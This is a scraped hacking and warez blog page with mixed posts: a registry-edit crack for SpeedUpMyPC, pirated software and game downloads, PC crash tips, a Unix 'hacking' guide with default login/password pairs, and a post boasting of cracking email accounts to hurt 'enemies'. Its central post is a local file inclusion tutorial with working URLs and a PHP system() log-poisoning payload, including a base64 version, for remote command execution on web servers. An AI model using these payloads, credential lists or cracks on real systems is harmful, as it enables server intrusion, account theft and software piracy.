Hacking Equipments | C/C++ Coding | Updates:: Did you tried Our Online ? AdobePhotoshop |

SpeedUpMyPC 2012 - 2013 (Full Version) for Free

11 Comments

What does this software do?


Find Solution For pc:

SpeedUpMyPC scans your computer to identify slowdown issues hindering speed, before wielding a powerful range of tools to optimize your system for improved performance. Slowdown issues, such as invalid registry entries are removed and unused processes deactivated to free up space. The result is a computer that works faster and better.



THIS PRODUCT ORIGNAL PRICE IS 30$ I THINK ,,BUT TAKE IT FOR FREE HERE IT IS :P


Download SpeedUpMyPC 2011:   





Now the Game Begins: (How To Crack)



1) Install It and Click on Scan Now as shown:



2) After scanning click on Fix Now as shown:



3) And Then it will offer you to fix 4 errors , click on it.


4) NOW Goto Task manager>Proccess>Show Proccess of All Users and then choose the following proccess.




5) Right Click On Following proccess given above and click on >>End Process Tree<< .



6) Now ensure your sppeduppc programe is closed, Goto start menu open run and Type there >>regedit<< click open Now a new window pop out.


7) Now Press CTRL + F or directely goto :

Edit>Find

Now a small box appears.


8) Hmm unchecked all three options except >>Values<< and type >>FreeFixesAplied<<< in the field and Click Ok, as shown:






Now Next Window Should Looks Like:



9) Now we are going to make our license file ,, Right click on free space and click

NEW>String Value

name that new file to >> license << and then it should looks like:



10) Double click on license and write the name on which you want to register the product :p i have typed h4ck3rjutt as seen:



and click ok

Now you,ve just Done open your SpeedUpPc and then click about you will see your shinning name on which product is registered. :p as my:



You might be able to find a working Serial but it will be Blacklisted by Uniblue in a couple of days.

(Didn't work?): If it didn't work, go back to FC (in registry) and make sure everything is in place. the "License string value, you created, PROBABLY won't be there.

So re-make it, name it "License" double click it, and put anything for value data. (As shown in the Video.)

SP 2011 might go unregistered after a couple days. If that happens just re-do the process.

Now be good and have good enjoy , Comment share and join

10+ reasons Why PCs Crash You must Know

371 Comments

Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any un

saved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?





1) Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

  • Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2) Bad Ram


Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3) BIOS settings


Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

4) Hard disk drives:


After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

  •  Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.
The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).
Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

  • Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.
Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

  • Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.



5) Fatal OE exceptions and VXD errors:




Fatal OE exception errors and VXD errors are often caused by video card problems.These can often be resolved easily by reducing the resolution of the video display. Go to

  • Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.
If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

  • Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adaptor. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.
If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.
The way to resolve a hardware conflict is to unchecked the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.
Another useful way to resolve video problems is to go to

  •  Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).
Look up your video card's manufacturer on the Internet and search for the most recent drivers for it.


6) Viruses:


Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

  • Start-Settings-Control Panel-Add/Remove Programs



Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your anti virus software manufacturer.

An excellent anti virus programme is McAfee VirusScan by Network Associates ( www.nai.com). Another is Norton AntiVirus 2000, made by Symantec ( www.symantec.com).

7) Printers:


The action of sending a document to print creates a bigger file, often called a postscript file.

Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.
If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.


8) Software:


A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.

The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000 and WINDOWS 7.

Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from www.jv16.org

Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.

Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.
Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.

Remember to restore all the BIOS settings back to their former settings following installation.

9) Overheating:


Central processing units (CPU) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.

One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com

CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

10) Power supply problems:


With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.

If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity( i suggest it for Pakistani and Indian hardly :p ) , and it will give you a few minutes to perform a controlled shutdown in case of a power cut.
It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

Give your Feedback :)

Skype 5.0 Working Version

0 Comments
TODAY i was in a chat with my friend and he told me that the latest skype version is not working for my p.c so i suggest him older version for his use,, many other blunders giving wrong softwares to make newbies hacked but it is the 5.0 version of skype and its working version.



Download 5.0 version from here :




Password: www.h4ck3rcracks.blogspot.com




Regards,
Zulqurnain jutt

How Pententing Works (LFI)

0 Comments
Originally Written By : "Fredrik Nordberg Almroth"

shared by : h4ck3r jutt



Local File Inclusion
As the title says, this is a "short" and descriptive guide about
various methods to exploit using a local file inclusion (LFI).
I will cover the following topics:


• Poison NULL Bytes
• Log Poisoning
• /proc/self/
• Alternative Log Poisoning
• Malicious image upload
• Injection of code by the use of e-mails
• Creativity

So

What is a LFI?


A LFI is, as the title says,a method for servers/scripts to include local files on run-time,in order to make complex systems of procedure calls.Well most of the time, you find the LFI vulnerabilities in URL's
of the web pages.Mainly because developers tend to like the use of GET requests
when including pages.Nothing more. Nothing less.So now, let's proceed shall we?How do you find (fingerprint) them?Let's say you find the following

URL: http://site.com/this/exploit/do.php?not=exist.php&for=real

Notice, that this URL goes to the do.php which is a sub-domain to site.com.
It has several parameters for the internal do.php to parse, the not and the for variable.


Let's study them a bit more.


The not variable contains the value of "exist.php", and the for variable contains "real". Now it turned pretty obvious,

didn't it?

The not variable seem to take another PHP file as an argument, most possibly for inclusion!
Hurray!

Let's try to play around with it!

Now what?

Let's try to tamper with the URL to see what we can do with it.


Let's change the content of the not variable to "/etc/passwd" and see what happens. Of course you can change the /etc/passwd to any other file of your choice, but we'll just stick with it throughout this tutorial.


http://site.com/this/exploit/do.php?not=/etc/passwd&for=real


Let's check the result! If you get a result looking something like this:


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin


Then sir.


You've done it correctly. You've found a LFI vulnerability!


The /etc/passwd file is world-readable on *NIX systems. That means, you can, buy a 99% chance, read it.

Unless someone have changed permissions or changed the open_basedir configuration.

But more of that some other time! Now let's try another scenario.

Say the programmer of the website coded like this:

How would we do then? We can't read /etc/passwd because the script appends .php to the end of the file.

What to do, what to do...Gladly for you, there's another trick here.

Poison NULL Byte. The NULL byte, is a special byte used everywhere in the background

of your computer (or your targets). It's the binary representation of: 00000000.


Yes. 8 zero's in binary, or the hexadecimal representation of 0x00.

Right...


One of the usages of this special byte is to terminate strings.If you've been programming for a while, you must know what a string is. An amount of text! Okay, it sounds complex now.

But this method is really really simple.

To bypass the .php concatenation, we simply append after our filename.

http://site.com/this/exploit/do.php?for=/etc/passwd

And hopefully, your result is once again:


root:x:0:0:root:/root:/bin/bash (…)


Awesome, we can now read any file on the server (with the privileges the account on the server we've now obtained)!

Now you might ask, how can we execute code through this? The answer is...

Log poisoning:


Say we're exploiting a plain normal Apache server. By default, it create two log files called access_log and error_log on the server. If we tamper those logs we can successfully upload our own PHP

code on the server, which might give you remote command execution if you wish, the choice is yours.

The question is, where are those logs stored? Gladly for you, i've compiled a small list.

Here you go:

/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/thttpd_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log

Now, there's two good methods for proceeding, depending of which log you choose. The best one (in my opinion) is by accessing the error_log. This method is a little outside the box. Say you find an LFI on this server, by simple going to this URL, PHP code will be saved in the error_log:


http://site.com/$s=$_GET;@chdir($s['x']);echo@system($s['y'])?>
Now try to reach it by going here:
http://site.com/this/exploit/do.php?for=/var/log/apache/logs/error_log&x=/&y=uname



If your result says something like Linux then your code execution was successful.

Yeah yeah, you get the point. It gets stored in the error_log because the file do not exist.


Method #2:



Accessing the access_log. It's a little bit more complicated, the best way to do this is to put PHP code in your user-agent. There's a great plugin for Firefox called "User Agent Switcher" to do this on the fly.

Other than that, it's the same thing. Go to:

http://site.com/

Or any other file accessible on the server, with your user-agent spoofed to your PHP snippet.

Then go to the access_log in order to execute the code

Example:
http://site.com/this/exploit/do.php?for=/var/log/apache/logs/access_log&x=/&y= <>

Yeah sure, youre so cool, you can execute your own code! Now,let's be hardcore.

/proc/self:


The Linux kernel is fascinating. I'm not sure if you've heard of this, but the /proc/self is a symbolic link (symlink) going to the instance of the target HTTP server.

There is several things you can do by using this link, one is to do the access_log-method,by simply spoofing your user-agent to PHP code, then try to include the:

/proc/self/environ.

Everyone knows that these days.That's not fun. However your code will be executed!

Let's move on to more... Uncommon methods. You can obtain the HTTP configuration file by simply trying to:

include /proc/self/cmdline

because most of the time the config file is set by a command-line argument, a simple, but a cool "feature", nothing malicious here, that's just the way it works. What you choose to do with the config file is up to you. The log-file location(s) tend to be in there... You got the grip now, I'll just keep writing.

There is yet another way to resolve the log-files by using this link, by simply going to the file description of the log file (the running stream).

Handy?
• Yes


No need for you to run a dictionary-attack in order to resolve the different log-files or to include the


/proc/self/cmdline



Now, how do we access those file descriptions? Well sir, the /proc/self tend to have a folder (?) called fd.


You guessed it right.fd do stand for file description. The content within fd is numeric ID's going to different open files. So the easiest way for us to find is, is to simply iterate our way through.

http://site.com/this/exploit/do.php?for=/proc/self/fd/0
http://site.com/this/exploit/do.php?for=/proc/self/fd/1
http://site.com/this/exploit/do.php?for=/proc/self/fd/2

http://site.com/this/exploit/do.php?for=/proc/self/fd/N

Soon or later, you'll find one of the log-files.By doing that you just go with the access_log or the error_log method(s).


Now seriously.

Have you ever had any success with the ordinary "Log Poisoning" methods?

I mean, in like 95% of the cases your requests gets URI encoded,and by that ruining your code.

So here comes an alternative method:


Alternative Log Poisoning:


Apache got the tendency to log the Authorized user if any is specified. The Authorization header is a part of the HTTP protocol, I've bet you've seen it. It creates a prompt asking for a username and password as htaccess do when you try to reach a protected folder. Internet Explorer makes a prompt looking like this:

Yeah, well. The username and password gets sent base64 encoded with : as a separator.

And as you might have figured out, the base64 won't get URLencoded! So by providing this header in your HTTP request:

Authorization: Basic
PD9QSFAgJHM9JF9HRVQ7QGNoZGlyKCRzWyd4J10pO2VjaG9Ac3lzdGVtKCRzWyd5J1
0pPz46


The code will stay untouched, and simply unpacked by Apache straight to the logs. The base64 is the small PHP payload I've used earlier, just with a : in the end to follow the HTTP RFC's. Now when we're on to it, exploiting using different methods and stuff.


Why not exploit LFI with a JPG?


Malicious image upload:


Yes, you heard me. You can use a picture in order to execute code by the use of a LFI vulnerability.

However you need special software to do this for you. The attack consists in changing the EXIF data of the image of your choose. Say you're exploiting a community, which allows image uploads, for

let's say, your avatar. By tampering with the EXIF data and by finding a LFI

you can take full control!

Cool huh? -_-

The EXIF data tend to hold what camera model, year, place, location, etc... When the image was taken, but, as proven before, it's rather easy to tamper with. Injection of code by the use of

E-mails:
Say your target server got port 109 or 110 open (POP2 or POP3) for
handling of e-mails.

You could send an e-mail to the HTTP server-user on target box. Like: apache@site.com And then try to include the /var/spool/mail/apache if this exists. It's possible to execute through this as well.

However it's not very common to find this specific exploit. Of course, the mail you send will contain the PHP code for you to execute. There is literally hundreds of ways to perform this attack depending on the mail-server running back-end. Qmail, for example, stores the incoming mails in /var/log/maillog

by default, but as been said before, this is thinking outside the box.

Creativity:

Why stop here?

I'm sure the Linux kernel, IRIX, AIM, Windows, SunOS, BSD and other OS's provides yet more interesting exploit scenarios.

Do they have SSH open?

If so, try to inject PHP code as the SSH username and go grab the SSH log.

Will it work? Maybe?

Can the embedding of malicious content like the JPG EXIF field be done withing a MP3 file?

Try it yourself. Be creative.


ALLAH HAFIZ

Plzz share your ideas and feedback in comments :)

Taken 3 game for Windows

2 Comments
Tekken 3 is the third installment in the popular Tekken fighting game series. It was released on Arcades in March 1997, and for the PlayStation in mid-1998.




Tekken 3 maintains the same core fighting system and concept as its predecessors, but brings many improvements, such as significantly more detailed graphics and animations, fifteen new characters added to the game's roster, more modern music and faster and more fluid gameplay.

Perhaps the most noticeable change from Tekken 2 fight system is movement reform - whereas the element of depth had been largely insignificant in previous Tekken games (aside from some characters having unique sidesteps and dodging maneuvers), Tekken 3 added emphasis on the third axis, allowing all characters to sidestep in or out of the background by lightly pressing the arcade stick (or tapping the controller button in the console version) towards the corresponding direction. Another big change in movement was that jumping was toned down, no longer allowing fighters to jump to extreme heights (as was present in previous games), but keeping leaps to reasonable, realistic heights. It made air combat more controllable, and put more use to sidestep dodges, as jumping no longer became a universal dodge move that was flying above all of the ground moves. Other than that, the improved engine allowed for quick recoveries from knockdowns  more escapes from tackles and stuns, better juggling (as many old moves had changed parameters, allowing them to connect in combo-situations, where they wouldn't connect in previous games) and extra newly-created combo throws.

Tekken 3 was the first Tekken to feature a beat 'em up Streets of Rage style minigame called Tekken Force, which pitted the player in various stages against enemies in a side-scrolling fashion. If the player succeeds in beating the mini game four times, Dr. Bosconovitch would be a playable character (granted that you defeat him first). This was continued in Tekken 4 and succeeded by the Devil Within minigame in Tekken 5 - but Boskonovitch was dropped as a playable character after Tekken 3. There is also a minigame called Tekken Ball, similar to beach volleyball, where one has to either "charge" a ball (hit the ball with a powerful attack) to hurt the opponent or try to hit the ball in such a way that it hits the ground in the opponent's area, thus causing damage.


Download :


Link1    or    Link2    or    Link3    or    Link4    or    Link5    

or    [MIRROR]

Instructions :


1) Download game .

2) extract it anywhere you want.

3) Now run the taken.reg file in the extracted folder.

4) Now run Taken.bat file any enjoy.

Don't forget to say thanks. Subscribe Us For Future Updates

Cheatbook 2012 Latest Database

0 Comments
It approximately contain all games cheats. check if you don't believe me :p




Cheatbook-DataBase 2012 is a freeware cheats code tracker that makes hints, Tricks, Tips and cheats (for PC, Walkthroughs, Playstation, Playstation 2, Playstation 3, Sega, Nintendo 64, Nintendo DS, DVD, Gameboy Advance, Gameboy Color, N-Gage, Nintendo DS, XBox, XBox 360, iPhone, Gamecube, Dreamcast, Super Nintendo, Wii, Sony PSP) easily accessible from one central location.

If you're an avid gamer and want a few extra weapons or lives to survive until the next level, this freeware cheat database can come to the rescue. Covering more than 21.000 Games Cheats, this database represents all genres and focuses on recent releases. Games are listed alphabetically in the left-hand window. When you click on a game name, the relevant cheat is displayed in a editor window, with convenient buttons that let you print the selection or save any changes you've made. In the latest past many users of the CheatBook- DataBase and readers of the monthly being published magazine have sent to us small error messages and suggestions for improvement again and again. First of all we say "Thank you very much!" to all of you! Due to this assistance and the permanent sending in of new and revised cheats the CheatBook is ever increasing and becoming more and more voluminous.

Release date January 13. 2012

Cheatbook-DataBase 2012 is Freeware for Win95/ 98/ 2000/ NT/ XP/ Vista / Windows 7.


Orignal Site: cheatbook.de

Download :





Don't forget to say thanks :) And Subscribe Us

Hacking Unix/Xenix Begginers Guide

0 Comments
******************************************************************************
A BEGINNERS GUIDE TO:

* * H A C K I N G * * 

* * U N I X * *

* * BY : H4ck3r Jutt * * 

* *(NOTE: THIS Article i have written by taking different ideas from different sources. ) * *

WRITTEN: 2011
******************************************************************************

in the following,


All References Made To The Name Unix, May Also Be Substituted To The Xenix Operating System. 


Brief History: 

Back In The Early Sixties, During The Development Of Third Generation Computers At Mit, 

A Group Of Programmers Studying The Potential Of Computers, Discovered  Their Ability Of Performing Two Or More Tasks Simultaneously. Bell Labs, Taking Notice Of This Discovery, 

Provided Funds For Their Developmental Scientists To Investigate Into This New Frontier. After About 2 Years Of Developmental Research, 

They Produced An Operating System They Called "Unix". 


Sixties To Current: 

During This Time Bell Systems Installed The Unix System To Provide Their Computer Operators With The Ability To Multitask So That They Could Become More Productive, And Efficient. One Of The Systems They Put On The Unix System Was Called "Elmos". Through Elmos Many Tasks (I.E. Billing,And Installation Records) Could Be Done By Many People Using The Same Mainframe. 

Note: Cosmos Is Accessed Through The Elmos System. 

Current: Today, With The Development Of Micro Computers, Such Multitasking Can Be Achieved By A Scaled Down Version Of Unix (But Just As Powerful). Microsoft,Seeing This Development, Opted To Develop Their Own Unix Like System For The Ibm Line Of Pc/Xt's. Their Result They Called Xenix (Pronounced Zee-Nicks). Both Unix And Xenix Can Be Easily Installed 

On Ibm Pc's And Offer The Same Function 

(Just 2 Different Vendors[Names] ). 

Note: Due To The Many Different Versions Of Unix (Berkley Unix, Bell System Iii, And System V The Most Popular) Many Commands Following May/May Not Work. I Have Written Them In System V Routines. 

Unix/Xenix Operating Systems Will Be Considered Identical Systems Below. 

How To Tell If/If Not You Are On A Unix System: 

Unix Systems Are Quite Common Systems Across The Country. 

Their Security Appears As Such: 


Login; (Or Login;) 

Password: 


When Hacking On A Unix System It Is Best To Use Lowercase Because The Unix System Commands Are All Done In Lowercase

Login: 


Is A 1-8 Character Field. It Is Usually The Name (I.E. Joe Or Fred) Of The User, Or Initials (I.E. J.Jones 
Or F.Wilson). Hints For Login Names Can Be Found Trashing The Location Of The Dial-Up (Use Your Cn/A To Find Where The Computer Is). 

Password: Is A 1-8 Character Password Assigned By The Sysop Or Chosen By The User. 

Common Default Logins 

                      
Login:                       Password: 

Root                        Root,System,Etc.. 

Sys                          Sys,System 

Daemon                   Daemon 

Uucp                       Uucp 

Tty                          Tty 

Test                        Test 

Unix                       Unix 

Bin                         Bin 

Adm                      Adm 

Who                      Who 

Learn                     Learn 

Uuhost                  Uuhost 

Nuucp                   Nuucp 




If You Guess A Login Name And You Are Not Asked For A Password, And Have Accessed To The System, Then You Have What Is Known As A Non-Gifted Account. 

If You Guess A Correct Login And Password, Then You Have A User Account. And, If You Guess The Root Password, Then You Have A "Superuser" Account. 

All Unix Systems Have The Following Installed To Their System: 

Root, Sys, Bin, Daemon, Uucp, Adm 

Once You Are In The System, You Will Get A Prompt. Common Prompts Are: 





But Can Be Just About Anything The Sysop Or User Wants It To Be. 

Things To Do When You Are In: Some Of The Commands That You May Want To Try Follow Below: 

Who Is On (Shows Who Is Currently Logged On The System.) 

Write Name (Name Is The Person You Wish To Chat With) 

To Exit Chat Mode Try Ctrl-D

Eot = End Of Transfer. 

Ls -A (List All Files In Current Directory.) 

Du -A (Checks Amount Of Memory Your Files Use;Disk Usage) 

Cd\Name (Name Is The Name Of The Sub-Directory You Choose) 

Cd\ (Brings Your Home Directory To Current Use) 

Cat Name (Name Is A Filename Either A Program Or Documentation Your Username Has Written) 

Most Unix Programs Are Written In The C Language Or Pascal Since Unix Is A Programmers' Environment. 

One Of The First Things Done On The System Is Print Up Or Capture (In A Buffer) The File Containing All User Names And Accounts. This Can Be Done By Doing The Following Command: 

Cat /Etc/Passwd 

If You Are Successful You Will A List Of All Accounts On The System. It Should Look Like This: 

Root:Hvnsdcf:0:0:Root Dir:/:
Joe:Majdnfd:1:1:Joe Cool:/Bin:/Bin/Joe
Hal::1:2:Hal Smith:/Bin:/Bin/Hal
The "Root" Line Tells The Following Info :
Login Name=Root
Hvnsdcf = Encrypted Password
0 = User Group Number
0 = User Number
Root Dir = Name Of User
/ = Root Directory 

In The Joe Login, The Last Part "/Bin/Joe " Tells Us Which Directory Is His Home Directory (Joe) Is. 


In The "Hal" Example The Login Name Is Followed By 2 Colons, That Means That There Is No Password Needed To Get In Using His Name. 


Conclusion: I Hope That This File Will Help Other Newbies Unix Hackers Obtain Access To The Unix/Xenix Systems That They May Find. There Is Still Wide Growth In The Future Of Unix, So I Hope Users Will Not Abuse Any Systems (Unix Or Any Others) That They May Happen Across On Their 
Journey Across The Electronic Highways Of America. There Is Much More To Be Learned About The Unix System That I Have Not Covered. They May Be Found By Buying A Book On The Unix System (How I Learned) Or In The Future I May Write A Another Version Of It..

That Will Be 2012 Version Inshallah!! Kindly Comment Rate And Share.

Crack any Email And Get Password

7 Comments
On a regular basis, a lot of people contact me about suspecting their partner of cheating and ask me how to hack their email password. so this is a tools i have used 1 year ago to make some my enemies cry try it :)





Sorry No Downloads Available At This Time ,, May be It will Fix Soon......

240+ online EBOOKS for free

0 Comments
(Press CTRL + C to Copy)

1-8  (removed)

9
Adventure in Prolog/AMZI
www.oopweb.com


10
Algorithms CMSC251/Mount, David
www.oopweb.com


11
Alison Balter's Mastering Access 95 development, premier ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

12
Apache : The definitive guide, 3rd.ed.
http://www.hk8.org/old_web/

13
Beej's guide to network programming/Hall, Brain
www.oopweb.com

14
Beyond Linux from Scratch/BLFS Development Team
http://book.onairweb.net/computer/os/linux/Administration/Beyond_Linux_From_Scratch/

15
Borland C++ builder unleashed
http://www.parsian.net/set1252/pages/books.htm

16
Building an intranet with windows NT 4
http://www.parsian.net/set1252/pages/books.htm

17
Building an Intranet with Windows NT 4
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

18
Building expert systems in prolog/AMZI
www.oopweb.com

19
C programming language
http://book.onairweb.net/computer/pl/C/The_C_Programming_Language_by_K&R/

20
C Programming/Holmes, Steven
www.oopweb.com

21
C++ Annotations
www.oopweb.com

22
CGI developer's guide
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

23
CGI manual of style
http://www.parsian.net/set1252/pages/books.htm

24
CGI manual of style online
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

25
CGI programming
http://www.hk8.org/old_web/

26
CGI programming unleashed
http://www.parsian.net/set1252/pages/books.htm

27
CGI programming with Perl, 2nd.ed.
http://www.hk8.org/old_web/

28
Charlie Calvert's Borland C++ builder unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

29
Client/server computing, 2nd.ed.
http://www.parsian.net/set1252/pages/books.htm

30
Client-server computing, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

31
Common LISP, the language/Steele, Guy
www.oopweb.com

32
Compilers and compiler generators : an introduction with C++/Terry, P.D.
www.oopweb.com

33
Complete idiot's guide to creating HTML webpage
http://www.parsian.net/set1252/pages/books.htm

34
Computer graphics CMSC 427/Mount, David
www.oopweb.com

35
Configuring and troubleshooting the windows NT/95 registry
http://www.parsian.net/set1252/pages/books.htm

36
Creating commercial websites
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

37
Creating web applets with Java
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

38
Crystal Reports.NET
http://www.crystalreportsbook.com/Chapters.asp

39
Curious about the internet
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

